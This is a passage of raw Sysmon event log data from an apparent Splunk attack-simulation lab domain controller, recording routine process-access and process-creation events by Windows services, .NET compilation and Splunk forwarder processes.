13:25:13.288{08A6967A-4638-6000-7403-000000009A01}3344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d10-0\PresentationFramework.Aero2.dll2021-01-14 13:25:13.288 10341000x80000000000000007612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:14.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463A-6000-7603-000000009A01}744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:14.195{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463A-6000-7603-000000009A01}744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:14.195{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463A-6000-7603-000000009A01}744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.960{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.960{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-463B-6000-7803-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-463B-6000-7803-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.882{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-463B-6000-7803-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.883{08A6967A-463B-6000-7803-000000009A01}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-463B-6000-7703-000000009A01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:15.210{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|